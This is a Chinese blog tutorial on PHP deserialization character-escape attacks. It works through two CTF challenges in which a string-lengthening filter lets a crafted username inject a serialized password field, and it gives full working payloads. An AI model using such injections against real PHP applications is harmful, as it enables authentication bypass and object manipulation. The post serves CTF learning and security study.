PHP反序列化字符逃逸

最新推荐文章于 2024-05-22 21:04:16 发布
最新推荐文章于 2024-05-22 21:04:16 发布
阅读量1k 收藏 3
点赞数 4
文章标签: PHP反序列化
m0re
本文链接:https://blog.csdn.net/qq_45836474/article/details/109541541
版权

前言

反序列化字符逃逸是最近很常见的题目,所以学习一下这个方面的知识。

正文

反序列化,理解之后。做题就没有那么难了,看了一篇微信推文,让我理解了PHP反序列化字符逃逸这个难点。

基础

<?php
 class m0re{
    public $aaa = '1emon';
    public $bbb = 'qwzf';
    public $SL = 'shalou';
 }
 $a = new m0re();
 print_r(serialize($a));
?>

序列化结果

O:4:"m0re":3:{s:3:"aaa";s:5:"1emon";s:3:"bbb";s:4:"qwzf";s:2:"SL";s:6:"shalou";}

反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。
在后面加上一些字符进行测试。像这样

m0re
仍然反序列化成功而且没有任何报错,足以说明反序列化的结束标志是;}
理解了这个就可以进行反序列化字符逃逸的学习了。

关键字符增加

反序列化逃逸的题目,会使用preg_replace函数替换关键字符,会使得关键字符增多或减少,首先介绍使关键字符增多的。
正常序列化的结果,
m0re
替换后,字符增多,无法完成反序列化。需要做一下改动的地方是username处,因为反序列化遇到;}与前面的{闭合,就会停止反序列化。后面的内容自然忽略。尝试更改username
m0re
这里username直接传入";s:8:"password";s:3:"lin";}在反序列化时,会在第一个;}的位置结束反序列化。
但是替换过后,比如o变成oo,可是因为是当作username传入的,所以结果会是这样的

a:2:{s:8:"username";s:4:"m00re";s:8:"password";s:3:"lin";}

这里还是4,实际上应该为5,所以反序列化就会失败。
但是这个值,是可以手动改的,只要算好替换后的位数,就可以使得反序列化成功。

例题1

#m3w师傅的题目
<?php
error_reporting(0);

class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

这里要求password=yu22x,但是password的值已经设置好了,这里就是用反序列化字符逃逸使得原本的密码不被反序列化。
先进行序列化,在本地测试,可以将密码先改为yu22x,然后进行序列化,

$uname=$_GET[1];
$password='yu22x';
$ser=filter(serialize(new a($uname,$password)));
//$test=unserialize($ser);
var_dump($ser);

得到结果

O:1:"a":2:{s:5:"uname";s:1:"?";s:8:"password";s:5:"yu22x";}

需要吞掉的部分是";s:8:"password";s:5:"yu22x";}这是30个字符,每替换一次增加2个字符,所以需要15个Firebasky才可以,所以构造payload

?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

这是需要当作username传入的参数,其实整个是
O:1:"a":2:{s:5:"uname";s:1:"?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}";s:8:"password";s:5:"yu22x";}
到第一个;}就会停止反序列化,更改的参数也是正确的,所以后面的password=1的部分就会被吞掉(忽略)。
反序列化成功就会得到flag。
m0re

例题2

上面那个是刚好够30被吞掉,每替换一次吞掉两个字符。
所以算起来比较方便。
这个是不一样的。

#unctf
<?php
error_reporting(0);
highlight_file(__FILE__);
class a
{
    public $uname;
    public $password;
    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup()
    {
            if($this->password==='easy')
            {
                include('flag.php');
                echo $flag;    
            }
            else
            {
                echo 'wrong password';
            }
        }
    }

function filter($string){
    return str_replace('challenge','easychallenge',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

还是在本地替换,替换正确密码。序列化结果。

O:1:"a":2:{s:5:"uname";s:1:"?";s:8:"password";s:4:"easy";}

这个是替换一次,增加四个。而需要吞掉";s:8:"password";s:4:"easy";}29个字符
无法正好替换,前面使用7个,则少一个,使用8个,则会多7个字符。
所以这里可以使用8个,后面使用一下占位符让其吞掉,比如;我理解的是因为遇到;}才会结束反序列化,所以在;前面加7个;使得反序列化成功。
payload

?1=challengechallengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";};;;;;;;

或者

?1=challengechallengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";;;;;;;;}

两个payload都一样的,可以序列化成功,得到flag

总结

关键字符减少的,等遇到题目再写。
以上题目均可百度找到。
参考文章
1、http://bealright.top:8888/2020/08/24/%E6%B5%85%E6%9E%90php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8/

2、https://mp.weixin.qq.com/s/7jAS7R_GuBBz6M8U6lQv-w

m0re
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php序列逃逸1
08-03
}结束,后的字符串不影响正常的序列php序列逃逸知识点 - 属性逃逸般在数据先经过次 serialize 再经过 unserialize,在这个中间
php序列字符逃逸
qq_53856457的博客
05-14 1613
php序列字符逃逸法 1.按我的理解,序列的过程就是碰到;}与最前面的{配对后,便停止序列。如下序列: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
CTFshow-RCE极限大挑战
qq_63928796的博客
11-21 2051
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限。
国赛练习(1)
最新发布
weixin_74020633的博客
05-22 1062
转为16进制的字符串在用hex2bin函数转为acill码时,需要引号包裹,但是引号被过滤了,可以使用"_"来让16进制被识别为字符串,再用substr,把下划线去掉进行进制转换。open_basedir是php.ini中的配置文件,可以限制用户访问文件的范围,例如本题,就限制了用户在php脚本中只能访问/var/www/html下的文件。最后的正则匹配过滤了大部分的命令执行,还有一些符号,三个函数可以说过滤了很多绕过方式,编码绕过的话,有特殊字符会被转义,命令执行被正则过滤或者转义。
CTFSHOW-PHP序列
Monica的博客
09-24 2469
WEB254 题目: <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->
PHP渗透测试题目笔记
Zeker62的博客
02-10 5514
最简单序列漏洞陷阱题 PHP序列漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单序列漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5635
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
PHP序列漏洞详解.rar
02-07
在IT安全领域,PHP序列漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php序列长度变尾部字符逃逸(0CTF-2016-piapiapia)
10-15
PHP序列长度变尾部字符逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列是将对象转换为可存储或传输的字符串的过程,而序列则是将这个字符串恢复为原始对象的过程。...
shiro序列测试工具.zip
06-04
在网络安全领域,"序列漏洞"是一种常见的安全问题,攻击者可以通过构造恶意的序列数据来执行远程代码或者获取敏感信息。Shiro框架在处理用户认证和授权时可能会涉及对象的序列序列,因此也可能存在...
Java序列漏洞利用工具.zip
04-10
Java序列漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列序列过程中的安全问题。序列是将对象状态转换为可存储或传输的数据格式的过程,而序列则是将这些数据恢复为原来的对象...
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1597
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
CTF中PHP相关题目考点总结(二)
weixin_68789096的博客
06-24 1114
本篇文章主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。
ctfshow web入门 序列
Lumos427的博客
02-25 1377
序列序列 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
CTF.show:veryphp
qq_46230755的博客
01-28 513
先审计一下代码 <?php error_reporting(0); highlight_file(__FILE__); include("config.php"); class qwq { function __wakeup(){ die("Access Denied!"); } static function oao(){ show_source("config.php"); } } $str = file_get_contents("
ctfshow_序列
qq_45951598的博客
01-27 1549
文章目录WEB254web255 WEB254 源码: error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-
文件包含漏洞&伪协议
qq_62078839的博客
04-16 2286
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
[BJDCTF2020]Easy MD5(浅谈PHP弱类型hash比较缺陷)
记录学习,一起进步
01-17 486
[BJDCTF2020]Easy MD5(浅谈PHP弱类型hash比较缺陷)
BMZCTF:Bestphp
末初的CSDN博客
04-25 1299
http://www.bmzclub.cn/challenges#Bestphp index.php <?php highlight_file(__FILE__); error_reporting(0); ini_set('open_basedir', '/var/www/html:/tmp'); $file = 'function.php'; $func = isset($_GET['function'])?$_GET['function']:'filte
fastjson序列字符串数组
03-03
Fastjson是一个Java语言编写的高性能JSON处理框架,它提供了丰富的功能和灵活的API,其中包括对序列字符串数组的支持。 要使用Fastjson进行序列字符串数组,可以按照以下步骤进行操作: 1. 导入Fastjson库:首先需要在项目中导入Fastjson库,可以通过Maven或手动下载并添加到项目的依赖中。 2. 创建JSON字符串:准备一个包含字符串数组的JSON字符串,例如:`["string1", "string2", "string3"]`。 3. 定义目标类型:创建一个Java类来表示目标类型,该类应该包含一个与JSON字符串中的数组对应的字段。 4. 进行序列:使用Fastjson提供的API进行序列操作。可以使用`JSON.parseObject()`方法将JSON字符串转换为Java对象,然后通过获取字段值来获取字符串数组。 下面是一个示例代码,演示了如何使用Fastjson序列字符串数组: ```java import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String jsonString = "[\"string1\", \"string2\", \"string3\"]"; // 定义目标类型 class MyObject { private String[] strings; public String[] getStrings() { return strings; } public void setStrings(String[] strings) { this.strings = strings; } } // 序列 MyObject myObject = JSON.parseObject(jsonString, MyObject.class); String[] strings = myObject.getStrings(); // 打印结果 for (String str : strings) { System.out.println(str); } } } ``` 这样,你就可以使用Fastjson来序列字符串数组了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值